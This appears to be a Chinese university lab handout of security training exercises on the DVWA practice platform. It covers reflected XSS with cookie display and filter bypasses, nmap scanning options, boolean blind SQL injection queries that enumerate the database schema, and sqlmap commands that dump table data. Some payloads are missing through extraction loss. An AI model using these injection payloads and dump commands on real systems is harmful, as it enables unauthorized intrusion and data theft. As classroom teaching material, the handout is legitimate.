1、数据库应用与安全管理实训3实训 反射型XSS 1一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。(2)在URL地址框中输入alert(/xss/),出现弹框。(3)在URL地址框中输入alert(document.cookie),出现弹框,获得当前页面的cookie。3. 将操作过程截图,整理文档后上传平台。实训 反射
2、型XSS 2一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Medium。2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。(2)在URL地址框中输入alert(/xss/),没有弹框。(3)选择“View Source”查看源程序,发现服务器端使用str_replace()函数对“”进行了替换,直接插入代码失效。(4)双写绕过。在”中在插入”的方式,实现绕过,具体格式如下:
3、 script 添加弹框。获得cookie。(5)大小写混淆绕过。将”进行大小写的变换,绕过str_replace()函数的检测。具体格式如下:添加弹框。获得cookie。3. 将操作过程截图,整理文档后上传平台。实训 反射型XSS 3一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为High。2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。(2)选择“View Source
4、”查看源程序,发现对“/”进行了替换,不能使用常用的绕过方法。(3)使用标签,如、等提供的方法进行脚本的注入。 标签弹窗: 标签获取cookie: 标签弹窗: 标签获取cookie:3. 将操作过程截图,整理文档后上传平台。主动扫描一、实验内容主动扫描。二、实验环境BackTrack /Kali Linux。三、实验操作步骤单个主机扫描:nmap ip单个主机在线状态扫描:nmap sn ip多个不连续主机扫描:nmap ip1 ip2 ip3多个连续主机扫描:nmap ip地址的范围整个子网扫描:nmap ip地址/掩码位数1、 主机发现。跳过ping扫描阶段:nmap PN ip仅使用pi
5、ng协议进行主机发现:nmap sP ip 使用ARP协议进行主机发现:nmap PR ip使用TCP协议进行主机发现:半开扫描:nmap sS ip 全开扫描:nmap sT ip使用UDP协议进行主机发现:nmap -sU ip 2、 端口发现。扫描全部端口:nmap p “*”ip扫描前n个端口:nmap -top-port n ip扫描指定端口:nmap p 端口号 ip3、 扫描目标操作系统:nmap O ip4、扫描目标服务:nmap sV ip5、扫描结果保存:nmap oX Report.xml ip 四、应用拓展1、主动扫描工具的实例使用。实训 SQL注入(布尔盲注)1一、实
6、训目的1. 了解SQL注入的常用方式2. 掌握SQL布尔盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2. 测试SQL注入点(1)点击SQL Injection(Blind),进入测试页面。(2)使用参数1 and 1=1 #进行提交,页面显示存在。使用参数1 and 1=2 #进行提交,页面显示不存在(3)猜解数据库名的长度。具体命令如下: 1 and length(database()=1 # /显示不存在 1 and length(database
7、()=2 # /显示不存在 1 and length(database()=3 # /显示不存在 1 and length(database()=4 # /显示存在(4)二分法猜解数据库名。具体命令如下: 1 and ascii(substr(database(),1,1)100 # /显示不存在修改substr函数的第二个参数,如substr(database(),2,1)进行测试,可以获得数据库的第二个字母。(5)猜解数据库表的数量。具体命令如下: 1 and (select count(table_name) from information_schema.tables where ta
8、ble_schema=database()=1 # /显示不存在 1 and (select count(table_name) from information_schema.tables where table_schema=database()=2 # /显示存在(6)猜解数据库表名的长度。具体命令格式如下: 1 and length(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=1 # /显示不存在 1 and length(subs
9、tr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=9 # /显示存在(7)猜解数据库表的名称。具体命令格式如下: 1 and ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)103 # /显示不存在重复上述步骤,猜解出两个表名。(8)猜解数据库表中的字段长度。具体命令格式如下: 1 and
10、(select count(column_name) from information_schema.columns where table_name= users)=1 # /显示不存在 1 and (select count(column_name) from information_schema.columns where table_name= users)=8 # /显示存在(9)猜解数据库表中的字段名称。具体命令格式如下: 1 and ascii(substr(select column_name from information_schema.columns where tabl
11、e_name= users limit 0,1),1,1)117 # /显示不存在 1 and ascii(substr(select column_name from information_schema.columns where table_name= users limit 0,1),1,1)97 # /显示不存在 1 and ascii(substr(select first_name from users limit 0,1),1,1)97 # /显示不存在3. 将操作过程截图,整理文档后上传平台。实训 SQL注入(SQLMAP)一、实训目的1. 了解SQL注入的常用方式2. 掌握
12、SQL工具注入的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)3. SQLMAP工具三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2. 测试SQL注入点(1)点击SQL Injection,进入测试页面。(2)在kali中调用sqlmap工具,使用命令“sqlmap u 目标地址”进行测试,系统直接跳转到登陆页面。(3)通过检查浏览器元素,在请求头中,查找到当前浏览器的cookie值。(4)添加-cookie参数,完成SQL注入测试。具体命令如下: sqlmap -u http:/192.168.124.
13、21/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low;PHPSESSID=4s878sd8gdop57r8l5ncdidv13“其中192.168.124.21是dvwa服务器的地址。(5)在前面的命令后加入-batch参数,sqlmap会自动填写参数并执行。发现SQL注入点。(6)获取当前数据库名称。具体命令格式如下: 添加参数-dbs (7)获取数据库中的表名。具体命令格式如下: 使用-D xxx指定查看的数据库,用-tables查看该数据库的所有表(8)获取users表中的字段名。具体命令格式如下: 使用-D xxx -T ttt指定查看的表,用-columns枚举表中的所有字段信息(9)获取表中的数据。具体命令格式如下: 使用-D xxx -T ttt -C ccc指定查看的字段, 用-dump转储DBMS数据表项3. 将操作过程截图,整理文档后上传平台。